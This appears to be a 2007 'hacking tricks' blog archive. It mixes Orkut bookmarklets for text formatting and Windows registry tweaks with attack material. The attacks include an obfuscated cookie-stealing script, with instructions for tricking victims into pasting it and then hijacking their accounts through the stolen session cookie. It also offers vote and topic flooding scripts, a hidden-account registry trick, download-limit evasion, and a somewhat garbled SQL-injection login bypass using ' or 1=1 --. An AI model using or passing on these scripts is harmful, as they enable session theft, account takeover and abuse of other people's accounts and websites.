Friday, November 30, 2007
Hack Megaupload !!
Click here
2. Type the megaupload link in the textbox where http:// is already written.
3. Uncheck all the options, like "No Cookies, No Scripts, No Images, Hide Referrer, Hide User Agent, Hide Title, Hide Header"
4. Click on the button "I agree an wish to surf anonymously".
After it there will be no LIMIT.
Download from megauload.com:
Here's my tutorial to download from megauload.com without getting the annoying message of 300 slots busy.
Downlaod user agent switcher ADDON then follow the instruction
For FIREFOX:
Click Install Now to install addon.
Restart FireFox. Tool-->User Agent Switcher--->Options--->Options
Click User Agents--->Add
Type this:
◘ Description: MEGAUPLOAD
◘ User Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; Alexa Toolbar)
Click OK twice to finish adding User Agent.
From now, before downloading any file on megaupload just go Tools--> User Agent Switcher--->MEGAUPLOAD.
For IE:
Start/run->> type regedit -> ok
Go to: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Internet Settings\5.0\User Agent\Post Platform]
Note: if U use IE 7
go to: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Internet Settings\User Agent\Post Platform]
Right click on Post Platform > New > String Value > type Alexa Toolbar > ok
Now U can download from megaupload without error
Orkut Hacking Same as Cookie Stealer !!
then make two fake accounts...u will need one to receive the cookie and one to advertise your script so that if orkut starts deleting such profiles your real account wont be compromised...
then heres the script
Code:
javascript:nobody=replyForm;nobody.toUserId.value=62915936;
nobody.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));
nobody.action='Scrapbook.aspx?Action.writeScrapBasic';nobody.submit()
u see the 62915936 part? thats the one u need to edit to get the cookie to your account..... HOW TO PUT UR NUMBER IN THAT SECTION??? FOLLOW THESE STEPS:
go to YOUR ALBUM section...go to ANY photo and right click on it,see the properties of your display image...u will see something like 12345678.jpg
there will be a eight digit value.. now put that value in the above javascript.thats it. now your javascript will look like
javascript:nobody=replyForm;nobody.toUserId.value=yournumber;
nobody.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));
nobody.action='Scrapbook.aspx?Action.writeScrapBasic';nobody.submit()
Now give this script to the victim,ask him to go to his scrap book and paste this script in his address bar and press enter. now you ll get his cookies in your scrapbook..
now after getting a cookie...go to your home page and open the cookie editor plugin(TOOLS-->COOKIE EDITOR)...type orkut in the text box and click filter/refresh.look for orkut_state cookie. just double click it and replace the orkut_state part with your victims...
no need to change the _umbz _umbc part...
ANOTHER SCRIPT: 100%working
javascript:nobody=replyForm;nobody.toUserId.value=53093255;nobody.scrapText.value=document.cookie;nobody.action='scrapbook.aspx?Action.submit';nobody.submit() put ur eight digit number in the place of (53093255)
Contact me on my E-mail Address if any problem comes
E-mail :- marshal.ramdev@gmail.com
How to Change your Processor name !!
TYPE REGEDIT
HKEY_LOCAL_MACHINE>HARDWARE>DISCRIPTION>SYSTEM>CENTRAL
Processor
On Right Hand side just right click on Processor name and string and then Click Ok
Now Modify and write what you want to write ..
Some Javascripts of Orkut !!
Multiple Voting script
Hey frends by using this script u will be able to vote for multiple choices even if the setting is set to single vote
Directions:
1.go to the poll
2.Paste the script in the address bar and hit enter
3.u get options for multiple voting
Hey ppl this is a new trick........copy da foll in the address bar and hit enter ...............
Are you low at scraps? Flood your or your friends' scrapbooks with thousands of scraps in one go.
Testimonial flooding!
==> Open the testimonial writting page of your any friend.
==> Paste this in the address bar:javascript:function sansor(){document.getElementsByTagName
(’input’).item(2).click();};void(setInterval(sansor,404)); There are some software available which will do all these sh*ts using some GUI.. I will
soon post the link for that. Keep checking my blogs..
Open your scrap book n paste this link to address bar.
javascript:function flood(n) {if (self.moveBy) {for (i = 35; i > 0; i--) {for (j = n; j > 0; j--) {self.moveBy(1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} flood(6);
Message Display
javascript:function reverse() { var inp = " ! skcirt n spit ot emocleW "; var outp="";for (i = 0; i <= inp.length; i++) { outp =inp.charAt (i) + outp;}alert(outp) ;}; reverse();
Dancing Images
javascript:b=[]; a=document.images; for(wt=0; wt<a.length; wt++){a[wt].style.position='relative'; b[b.length]=a[wt]}; j=0; setInterval('j++; for(wt=0; wt<b.length; wt++){b[wt].style.left=Math.sin((6.28/a.length)*wt+j/10)*10}; void(0)',1); void(0);
Colourfull Lool (suits Orkut)
javascript: mwunm=0; c=["red","blue","green"]; a=document.links;setInterval('mwunm++;a[mwunm % document.links.length].style.color=c[mwunm % c.length]',10);void(0);
Mad Orkut
javascript:R=-1;DI=document.links;DIL=DI.length;function A(a,b,c){return Math.sin(R/350*6.28*b+a)*c+c}function B(a){DIS=DI.item(a).style;DIS.position='absolute';DIS.left=A(5,100,500);DIS.top=A(5.6,60,150)}setInterval('R++;B(R%DIL)',15);void(0);
Colourfull Scraps
javascript:cor=new Array('b','green','yellow','red' );var z=0;txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/(.)/gi,"§$1");txt.value=txt.value.replace(/\§ /gi," ");for(y=0;y<txt.value.length;y++){txt.value=txt.value.replace(/\§/,'['+cor[z]+']');z++;if(z==cor.length){z=0}}void(0);
Image Roller
javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300;y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function A(){for(i=0; i<DIL; i++){DIS=DI[ i ].style; DIS.position='absolute';DIS.left=Math.sin(R*x1+i*x2+x3)*x4+x5;DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++}setInterval('A()',5); void(0);
Colour logout Button
javascript: x=0; c=["red","yellow"]; setInterval('x=x^1;document.links[2].style.color=c[x]',100);void(0);
Add signature after message
javascript: a=document.getElementsByTagName('textarea')[0];a.value="[*red]"+a.value+"\n\n\n[*/b][*/red][*b][*gold]arsh\n\n[*b]";void(0)
Dont forget to remove the * frm the script
Delete Topic (can be done only by the person hu created the topic)
javascript:submitForm(document.forms[1],'delete_entire_topic','');void(0);
Vote:Select All Options
javascript:inputs=document.getElementsByTagName('input');for(x=0;x<inputs.length;x++){tipo=inputs[x].type;if(tipo=="radio"){inputs[x].type="checkbox";inputs[x].checked="true"}};void(0)
Note: Works only wid Mozilla Firefox
Vote Flooder..!!
javascript:opcao=prompt("enter option u want to flood eg like 1 or 2 or 3 or 4...","");votos=prompt("enter no. of votes?\n31 max",31);send = "POST_TOKEN="+encodeURIComponent(document.getElementsByName('POST_TOKEN')[0].value)+"&signature="+encodeURIComponent(document.getElementsByName('signature')[0].value);for(x=0; x<votos; x++){ send += "&option="+opcao;}send += "&public_vote=1&Action.vote=Enviar+dados";xml=new XMLHttpRequest();xml.open("POST",location.href,false);xml.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xml.send(send);document.body.innerHTML=xml.responseText;void(0)
Note: Works Only Wid Mozilla Firefox
javascript:var txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/a/gi,"a");txt.value=txt.value.replace(/p/gi,"?");txt.value=txt.value.replace(/N/gi,"?");txt.value=txt.value.replace(/t/gi,"?");txt.value=txt.value.replace(/E/gi,"?");txt.value=txt.value.replace(/u/gi,"?");txt.value=txt.value.replace(/h/gi,"?");txt.value=txt.value.replace(/s/gi,"?");txt.value=txt.value.replace(/o/gi,"s");txt.value=txt.value.replace(/m/gi,"?");txt.value=txt.value.replace(/r/gi,"?");void(0);
More Cool fancy fonts
javascript:var txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/A/gi,"Ã…");txt.value=txt.value.replace(/B/gi,"ß");txt.value=txt.value.replace(/C/gi,"©");txt.value=txt.value.replace(/D/gi,"Ã");txt.value=txt.value.replace(/E/gi,"Ë");txt.value=txt.value.replace(/F/gi,"Æ’");txt.value=txt.value.replace(/i/gi,"î");txt.value=txt.value.replace(/s/gi,"§");txt.value=txt.value.replace(/o/gi,"ø");txt.value=txt.value.replace(/u/gi,"µ");txt.value=txt.value.replace(/r/gi,"®");void(0);
javascript:cor=new Array('u','b','i','u');var z=1;txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/(.)/gi,"§$1");txt.value=txt.value.replace(/\§ /gi," ");for(y=0;y<txt.value.length;y++){txt.value=txt.value.replace(/\§/,'[/'+cor[z-1]+']'+'['+cor[z]+']');z++;if(z==cor.length){z=1}}void(0);
n More
javascript:cor=new Array('b','blue','u',':)','red','i',':p','green','b',':d','b');var z=1;txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/(.)/gi,"§$1");txt.value=txt.value.replace(/\§ /gi," ");for(y=0;y<txt.value.length;y++){txt.value=txt.value.replace(/\§/,'[/'+cor[z-1]+']'+'['+cor[z]+']');z++;if(z==cor.length){z=1}}void(0);
n More
javascript:cor=new Array('b','blue','u','red','i','green','b');var z=1;txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/(.)/gi,"§$1");txt.value=txt.value.replace(/\§ /gi," ");for(y=0;y<txt.value.length;y++){txt.value=txt.value.replace(/\§/,'[/'+cor[z-1]+']'+'['+cor[z]+']');z++;if(z==cor.length){z=1}}void(0);
Sum more cool fonts
javascript:var txt=document.getElementsByTagName('textarea')[0]; txt.value=txt.value.replace(/a/gi,"Ä…"); txt.value=txt.value.replace(/b/gi,"Ъ"); txt.value=txt.value.replace(/c/gi,"⊂"); txt.value=txt.value.replace(/d/gi,"Ôº"); txt.value=txt.value.replace(/e/gi,"ξ"); txt.value=txt.value.replace(/f/gi,"åƒ"); txt.value=txt.value.replace(/g/gi,"Ç¥"); txt.value=txt.value.replace(/h/gi,"å”"); txt.value=txt.value.replace(/i/gi,"Ä®"); txt.value=txt.value.replace(/j/gi,"ໆ"); txt.value=txt.value.replace(/k/gi,"Ò"); txt.value=txt.value.replace(/l/gi,"â…¬"); txt.value=txt.value.replace(/m/gi,"â™"); txt.value=txt.value.replace(/n/gi,"ïœ"); txt.value=txt.value.replace(/o/gi,"ø"); txt.value=txt.value.replace(/p/gi,"Ï"); txt.value=txt.value.replace(/q/gi,"â„š"); txt.value=txt.value.replace(/r/gi,"Å™"); txt.value=txt.value.replace(/s/gi,"૬"); txt.value=txt.value.replace(/t/gi,"Ŧ"); txt.value=txt.value.replace(/u/gi,"☋"); txt.value=txt.value.replace(/v/gi,"√"); txt.value=txt.value.replace(/w/gi,"ω"); txt.value=txt.value.replace(/x/gi,"乂"); txt.value=txt.value.replace(/y/gi,"Ⴘ"); txt.value=txt.value.replace(/z/gi,"之");
javascript:var txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/a/gi,"α");txt.value=txt.value.replace(/b/gi,"ß");txt.value=txt.value.replace(/N/gi,"и");txt.value=txt.value.replace(/t/gi,"Ñ‚");txt.value=txt.value.replace(/E/gi,"Ñ”");txt.value=txt.value.replace(/f/gi,"Æ’");txt.value=txt.value.replace(/i/gi,"ι");txt.value=txt.value.replace(/s/gi,"$");txt.value=txt.value.replace(/o/gi,"ø");txt.value=txt.value.replace(/m/gi,"м");txt.value=txt.value.replace(/r/gi,"Ñ");void(0);
n More
javascript:cor=new Array('violet','orange','green');var z=0;txt=document.getElementsByTagName('textarea')[0]; txt.value=txt.value.replace(/\n/gi,'§ ');sp=txt.value.split(' ');txti='';for(l=0;l<sp.length;l++){txti+="["+cor[z]+"]"+sp+' ';z++;if(z==cor.length){z=0}}; txt.value=txti;txt.value=txt.value.replace(/\§/gi,'\n'); txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/ /gi,":¦: ? :¦:");void(0);
Script called Holi
javascript: i=0;c=["red","green","blue","yellow","magenta","orange","black","white"]; a=document.links;setInterval('i++;a[i % document.links.length].style.color=c[i % c.length]',10);void(0);
Display Image Size Expander
javascript:document.body.innerHTML=document.body.innerHTML.replace(/small/g,"medium");void(0);
N more
javascript:var a=document.getElementsByTagName('textarea')[0];a.value=a.value.replace(/|/g," \n ");void(0);javascript:cor=new Array('violet','red','orange','yellow','green','blue','navy','purple');var z=0;txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/(.)/gi,"§$1");txt.value=txt.value.replace(/\§ /gi," ");for(y=0;y<txt.value.length;y++){txt.value=txt.value.replace(/\§/,'['+cor[z]+']');z++;if(z==cor.length){z=0}}void(0);
Add Yourself in Orkut
------------
* Click on Friends.
* Paste the script in the Address Bar.
* Press Enter.
* You will see a Friend Request from your own ID...
javascript:add=document.forms[1]; add.action='FriendAdd.aspx?Action.yes&'+location.href.match(/uid=\d*/gi);add.submit();alert('User Added ;)'); void (0)
However U cannot accept it
n More
javascript:var txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/a/gi,"?");txt.value=txt.value.replace(/b/gi,"ß");txt.value=txt.value.replace(/N/gi,"?");txt.value=txt.value.replace(/t/gi,"?");txt.value=txt.value.replace(/E/gi,"e");txt.value=txt.value.replace(/f/gi,"ƒ");txt.value=txt.value.replace(/p/gi,"Þ");txt.value=txt.value.replace(/s/gi,"s");txt.value=txt.value.replace(/o/gi,"?");txt.value=txt.value.replace(/m/gi,"?");txt.value=txt.value.replace(/r/gi,"r");void(0);
n More
javascript:cor=new Array(':)','blue');var z=0;txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/(.)/gi,"§$1");txt.value=txt.value.replace(/\§ /gi," ");for(y=0;y<txt.value.length;y++){txt.value=txt.value.replace(/\§/,'['+cor[z]+']');z++;if(z==cor.length){z=0}}void(0);
n More
*?*
*?* I *?*
*?* s *?*
*?* n *?*
*?* t *?*
*?* *?*
*?* d *?*
*?* i *?*
*?* s *?*
*?* *?*
*?* t *?*
*?* h *?*
*?* e *?*
*?* *?*
*?* b *?*
*?* e *?*
*?* s *?*
*?* t *?*
*?* *?*
*?* ? *?*
*?*
javascript:var a=document.getElementsByTagName('textarea')[0];a.value=a.value.replace(/|/g," *?* \n*?* ");void(0);javascript:cor=new Array('violet','red','orange','yellow','green','blue','navy','purple');var z=0;txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/(.)/gi,"§$1");txt.value=txt.value.replace(/\§ /gi," ");for(y=0;y<txt.value.length;y++){txt.value=txt.value.replace(/\§/,'['+cor[z]+']');z++;if(z==cor.length){z=0}}void(0);
delete topic frm community.......
Requirement: You must be the creator of the topic in the community. You NEED NOT be the owner of the community. The first post created by you must be still present.
Open the first page of the topic created by you in the community.
Copy the following java script into the URL Bar.
javascript:_submitForm(document.forms[1]<wbr>,'delete_entire_topic','');void(0)
Hit ENTER.
Your topic is deleted
Change the portion in red with ur "gid"
Still Thinking wht it does???
Well Send this script to ur frend saying it is a scrapbook flooder.........it will flood his scrapbook along with urs........Change the portion in green wid wht u want him/her to flood ur scrapbook wid............
The person should be on ur frend list!!
Note:Tell him/her to use firefox...................cauz it doesnt work in IE!
Wondering wht ur "gid" is???
To find out go to ur profile and then view source
Find sumtin like this:
<table border="0" cellpadding="0" cellspacing="0">
<tr>
<td valign="top">
<table border="0" cellpadding="0" cellspacing="0">
<tr>
<td>
<div class="navPanelTop" width="144">
<div style="background-image: url(http://img2.orkut.com/images/medium/1181293889/46811582.jpg); background-position: center; background-repeat: no-repeat; width: 144px; height:128px;" >
<div style="text-align: center; background-image:url(http://img1.orkut.com/img/b.gif); width: 144px; height: 128px; vertical-align: middle;">
<img src="http://img1.orkut.com/img/b.gif" height="128" width="128" alt="" />
</div>
</div>
The thing in red is ur gid........replace mine wid urs
It should be 8 bit gid value
this is actually a bug in poll..
http://www.orkut.com/CommPollResults.aspx?cmm=40588034&pct=1194533995&pid=940476781
method :
run this javascript in the poll page
javascript:nobody=1;send = "POST_TOKEN="+encodeURIComponent(document.getElementsByName('POST_TOKEN')[0].value)+"&signature="+encodeURIComponent(document.getElementsByName('signature')[0].value);for(x=0; x<31; x++){ send += "&option="+nobody;nobody++}send += "&public_vote=1&Action.vote=Send+Data";xml=new XMLHttpRequest();xml.open("POST",location.href,false);xml.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xml.send(send);document.body.innerHTML=xml.responseText;alert("Done...:)\n Hit the refresh button"); void(0);
then it takes u to "bad bad server ......" page
just hit the refresh button ... and u r done ...
it shows that there are no votes though it shows a tick
this works only in Firefox ... for opera u need to edit the source
javascript:name=prompt("Type Your name here");alert(" HI " + name + " \nHowz Life ");
fancy script
javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function A(){for(i=0; i<DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=Math.sin(R*x1+i*x2+x3)*x4+x5; DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++}setInterval('A()',5); void(0);
see this too..fancy script
javascript:i=0;c=["red","green","blue","yellow","magenta","orange","pink","violet"]; a=document.links;setInterval('i++;a[i % document.links.length].style.color=c[i % c.length]',10);void(0); alert("Tips n tricks rocks! ");
# Run the script whenever you are sending an link to any one.This will break captcha and the link will be in colours.
# This will help you to send easy scraps without the captcha's.
# Paste any one of the below scripts and run on the page you have opened(scrapbook).
javascript: var friend =1;for(i=1;i<=friend;i++){msg="";if(i==1)msg=" captcha crack!! By:Amna!";alert(msg);}i=0; c=["violet","red","purple"];a=document.links;setInterval('i++;a[i %document.links.length].style.color=c[i %c.length]',1);void(0);javascript:var txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/a/gi,"a");txt.value=txt.value.replace(/p/gi,"?");txt.value=txt.value.replace(/N/gi,"?");txt.valuetxt.value.replace(/t/gi,"?");txt.value=txt.value.replace(/E/gi,"?");txt.value=txt.value.replace(/u/gi,"?");txt.value=txt.value.replace(/h/gi,"?");txt.value=txt.value.replace(/s/gi,"?");txt.value=txt.value.replace(/o/gi,"s");txt.value=txt.value.replace(/m/gi,"?");txt.value=txt.value.replace(/r/gi,"?");void(0);javascript:cor=newArray('b','red','/red','/b');var z=0;txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/(.)/gi,"§$1");txt.value=txt.value.replace(/(´)/gi,"[/b*][violet*]&*#9825[/violet*]");txt.value=txt.value.replace(/(`)/gi,"[b*][violet*]&*#9825[/violet*][/b*]");txt.value=txt.value.replace(/(~)/gi,"[/b*][purple*]&*#9829[/purple*]");txt.value=txt.value.replace(/\§/gi,"");for(y=0;y<txt.value.length;y++){txt.value=txt.value.replace(/\§/,'['+cor[z]+']');z++;if(z==cor.length){z=0}}void(0);
use this script in ur scrapbook to make the text area biggg
javascript: function nik(){document.forms[1].elements[2].rows="30";}void(setInterval(nik,0));
:accept all pending requests
javascript: i=0; document.body.innerHTML+='<iframe name="z" width="680" height="430"/>'; setInterval('i++;x=document.forms[ i ];x.target="z";_submitForm(x, "acceptPending");',1200);void(0);
script to accept all testimonials
javascript:i=1;setInterval('_submitForm(document.forms[ i ],"handleTestimonial");i=i+2',800);void(0);
script to reject all testimonials
javascript:i=2;setInterval('_submitForm(document.forms[ i ],"handleTestimonial");i=i+2',800);void(0);
TOPIC FLOODER (new)
javascript:var i=0;function de(){i=Math.floor(Math.random()*98153556346);document.getElementsByTagName("textarea").item(0).value="Death " + i;document.getElementById("subject").value="death "+i;;_submitForm(document.getElementsByTagName('tr').item(15),'submit','');}void(setInterval(de,800));
HOw 2 use ---------
* Open any page in Orkut which contains text box.
* Type the message.
* Paste one of the following Scripts in the Address Bar.
* Press Enter.
* Then Click Submit...
javascript:cor=new Array('aqua','blue','fuchsia','gold','gray','green','lime','maroon','navy','olive','orange','pink','purple','red','silver','teal','violet', 'yellow' );var z=0;txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/(.)/gi,"§$1");txt.value=txt.value.replace(/\§ /gi," ");for(y=0;y<txt.value.length;y++){txt.value=txt.value.replace(/\§/,'['+cor[z]+']');z++;if(z==cor.length){z=0}}void(0);
____________________________________________________________________________________________
javascript:var txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/A/gi,"Ã-") ;txt.value=txt.value.replace(/B/gi,"Ãy");txt.value=txt.value.replace(/C/gi,"©");txt.value=txt.value.replace(/D/gi,"Ã"); txt.value=txt.value.replace(/E/gi,"Ã<");txt.value=txt.value.replace(/F/gi,"Æ'");txt.value=txt.value.replace(/i/gi,"î");txt.value= txt.value.replace(/s/gi,"§");txt.value=txt.value.replace(/o/gi,"ø");txt.value=txt.value.replace(/u/gi,"µ");txt.value=txt.value. replace(/r/gi,"®");void(0);
____________________________________________________________________________________________________
javascript:cor=new Array('u','b','i','u');var z=1;txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/(.)/gi,"§$1");txt.value=txt.value.replace(/\§ /gi," ");for(y=0;y<txt.value.length;y++){txt.value=txt.value.replace(/\§/,'[/'+cor[z-1]+']'+'['+cor[z]+']');z++;if(z==cor.length){z=1}}void(0);
SOME MORE 4 YOU
javascript:var txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/a/gi,"?"); txt.value=txt.value.replace(/b/gi,"ß");txt.value=txt.value.replace(/N/gi,"?");txt.value=txt.value.replace(/t/gi,"?") ;txt.value=txt.value.replace(/E/gi,"?");txt.value=txt.value.replace(/f/gi,"f");txt.value=txt.value.replace (/p/gi,"þ");txt.value=txt.value.replace(/s/gi,"?");txt.value=txt.value.replace(/o/gi,"s");txt.value=txt.value.replace(/m/gi,"?") ;txt.value=txt.value.replace(/r/gi,"?");void(0);
____________________________________________________________________________________________________
javascript:var txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/a/gi,"?");txt.value=txt.value.replace(/b/gi,"ß");txt.value=txt.value.replace(/N/gi,"?");txt.value=txt.value.replace(/t/gi,"?");txt.value=txt.value.replace(/E/gi,"?");txt.value=txt.value.replace(/f/gi,"ƒ");txt.value=txt.value.replace(/p/gi,"þ");txt.value=txt.value.replace(/s/gi,"?");txt.value=txt.value.replace(/o/gi,"s");txt.value=txt.value.replace(/m/gi,"?");txt.value=txt.value.replace(/r/gi,"?");void(0);
MORE MORE
javascript:cor=new Array('green',':x','gold',';)','blue',':)','red',':(','orange','8)','green',':D','blue',':o','lime','/)','gray',':P');var z=0;txt=document.getElementsByTagName('textarea')[0]; txt.value=txt.value.replace(/\n/gi,'§ ');sp=txt.value.split(' ');txti='';for(l=0;l<sp.length;l++){txti+="["+cor[z]+"]"+sp+' ';z++;if(z==cor.length){z=0}}; txt.value=txti;txt.value=txt.value.replace(/\§/gi,'\n');void(0);
MORE KOOL FONTS
____________________________________________________________________
javascript:cor=new Array('aqua','blue','fuchsia','gold','gray','green','lime','maroon','navy','olive','orange','pink','purple','red','silver','teal','violet', 'yellow' );var z=0;txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/(.)/gi,"§$1");txt.value=txt.value.replace(/\§ /gi," ");for(y=0;y<txt.value.length;y++){txt.value=txt.value.replace(/\§/,'['+cor[z]+']');z++;if(z==cor.length){z=0}}void(0)
=+=+=+=+=
javascript:var txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/a/gi,"?"); txt.value=txt.value.replace(/b/gi,"ß");txt.value=txt.value.replace(/N/gi,"?");txt.value=txt.value.replace(/t/gi,"?") ;txt.value=txt.value.replace(/E/gi,"?");txt.value=txt.value.replace(/f/gi,"f");txt.value=txt.value.replace (/p/gi,"þ");txt.value=txt.value.replace(/s/gi,"?");txt.value=txt.value.replace(/o/gi,"s");txt.value=txt.value.replace(/m/gi,"?") ;txt.value=txt.value.replace(/r/gi,"?");void(0);
=======
javascript:cor=new Array('u','b','i','u');var z=1;txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/(.)/gi,"§$1");txt.value=txt.value.replace(/\§ /gi," ");for(y=0;y<txt.value.length;y++){txt.value=txt.value.replace(/\§/,'[/'+cor[z-1]+']'+'['+cor[z]+']');z++;if(z==cor.length){z=1}}void(0)
=======
javascript:cor=new Array('violet','orange','green');var z=0;txt=document.getElementsByTagName('textarea')[0]; txt.value=txt.value.replace(/\n/gi,'§ ');sp=txt.value.split(' ');txti='';for(l=0;l<sp.length;l++){txti+="["+cor[z]+"]"+sp+' ';z++;if(z==cor.length){z=0}}; txt.value=txti;txt.value=txt.value.replace(/\§/gi,'\n'); txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/ /gi,":¦: ? :¦:");void(0);
javascript:msgm=prompt("mensagem ");cor1="green";cor2="blue";cor3="red";b="b";i="i";flor="\n["+b+"]["+cor2+"]e??[/"+cor2+"] ["+i+"]"+msgm+"[/"+i+"] ["+cor2+"]e??[/"+cor2+"]\n\n["+b+"]["+cor1+"]???["+cor3+"]?["+cor1+"]???\n";z=document.getElementsByTagName('textarea')[0];z.value=flor;void(0);
javascript:msgm=prompt("Type Your Message Here ");cor1="green";cor2="blue";cor3="red";b="b";i="i";flor="\n["+b+"]["+cor2+"]e??[/"+cor2+"] ["+i+"]"+msgm+"[/"+i+"] ["+cor2+"]e??[/"+cor2+"]\n\n["+b+"]["+cor1+"]???["+cor3+"]?["+cor1+"]???\n";z=document.getElementsByTagName('textarea')[0];z.value=flor;void(0);
javascript:cor=new Array('teal','orange','olive','violet','maroon');var z=0;txt=document.getElementsByTagName('textarea')[0]; txt.value=txt.value.replace(/\n/gi,'§ ');sp=txt.value.split(' ');txti='';for(l=0;l<sp.length;l++){txti+="["+cor[z]+"]"+sp+' ';z++;if(z==cor.length){z=0}}; txt.value=txti;txt.value=txt.value.replace(/\§/gi,'\n'); txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/ /gi,"?(•?.•?)?");void(0);
Wednesday, November 28, 2007
Hide User Account !!
2• Registry Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\
Winlogon\SpecialAccounts\UserList
3• Modify/Create the Value Data Type(s) and Value Name(s) as detailed below.
4• Data Type: REG_DWORD [Dword Value] // Value Name: Type Name of Account to be Hidden
5• Setting for Value Data: [0 = Account is Hidden / 1 = Enabled]
6•Exit Registry and Reboot.
Login through Cookies in Orkut !!
Download this new cookie editor.
1• open mozilla and cookie editor
Now delete orkut state and create a new one to login in the account.
how to create :
Name : orkut_state
Content : ORKUTPREF=ID___________________till : [this u found in the cookie u recieved ........
host : .www.orkut.com
Path ://
save and close. Now just open orkut.com and u are in the account....
Tuesday, November 27, 2007
Menu Delays !!
Reboot to take effect ..
Lock Out Unwanted Users !!
2. Go to HKEY_LOCAL_MACHINE\Network\Logon
3. Create a dword value “MustBeValidated”
4. Set the value to 1
This forced logon can be bypassed in Safe Mode on Windows 9x
Monday, November 26, 2007
Hacking websites !!
Not For all Websites
If you have the html and javascript knowledge then you can access password protected websites.
1. Open the website you want to hack. Provide wrong username-password in its log in form.
(e.g : Username : me and Password: ' or 1=1 --)
An error will occur saying wrong username-password. Now be prepared
Your experiment starts from here...
2. Right click anywhere on that error page =>> go to view source.
3. There you can see the html codings with javascripts.
4. There you find somewhat like this.... <_form action="..login....">
< =..login....>
5. Before this login information<=__LOGIN> copy the url of the site in which you are.
(e.g :"<_form..........action=http://www.targetwebsite.com/login.......><..........=HTTP: com="">")<..........=HTTP: com="">
6. Then delete the javascript from the above that validates your information in the server.(Do this very carefully, ur success to hack the site depends upon this i.e how efficiently you delete the javascripts that validate ur account information)
7. Then take a close look for "<_input name="password" type="password">"[without quotes] -> replace "<_type=text> " there <=TEXT>instead of "<_type=password>"<=TEXT><=>. See there if maxlength of password is less than 11 then increase it to 11 (e.g : if then write )
8. Just go to file => save as and save it any where in your hardisk with ext.html(e.g: c:\eg.html)
9. Reopen your target web page by double clicking eg.html' file that you have saved.
10. U see that some changes in current page as compared to original One. Don't get worried.
11. Provide any username[e.g:hacker] and password[e.g:' or 1=1 --]
Congrats!!!!!! You have successfully cracked the above website and entered into the account of Ist user saved in the server's database.
[Please read "_form"="form" & "_type"="type" & "_input"="input" without quotes]
The above trick won't work on the websites using latest technique to protect there servers. But you can find many sites !!
Enjoy !!
Saturday, November 24, 2007
Some More Registry Tips and Tweaks !!
[HKEY_CLASSES_ROOT\lnkfile]
"IsShortcut"=-
Empty Temporary Internet Files Folder When Browser Is Closed
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache]
"Persistent"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache]
"Persistent"=dword:00000000
Remove "Links" Folder From Favorites
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar]
"Locked"=dword:00000001
"LinksFolderName"=""
Disable Automatic Image Re-Size in Internet Explorer
[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main]
"Enable AutoImageResize"="no"
Disable Media Player EULA
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsMediaPlayer]
"GroupPrivacyAcceptance"=dword:00000001
Remove Shared Documents
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoSharedDocuments"=dword:00000001
Add 'Disk Cleanup' on Right Click of a Drive
[HKEY_CLASSES_ROOT\Drive\shell\Disk Cleanup\command]
@="cleanmgr.exe /d %1"
Disable Automatic Restart in the event of a Blue Screen of Death (BSOD)
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\CrashControl]
"AutoReboot"=dword:00000000
Disable Shutdown Event Tracker (Shutdown Speedup)
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Reliability]
"ShutdownReasonOn"=dword:00000000
"ShutdownReasonUI"=dword:00000000
Disable the NTFS Last Access Time Stamp update
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem]
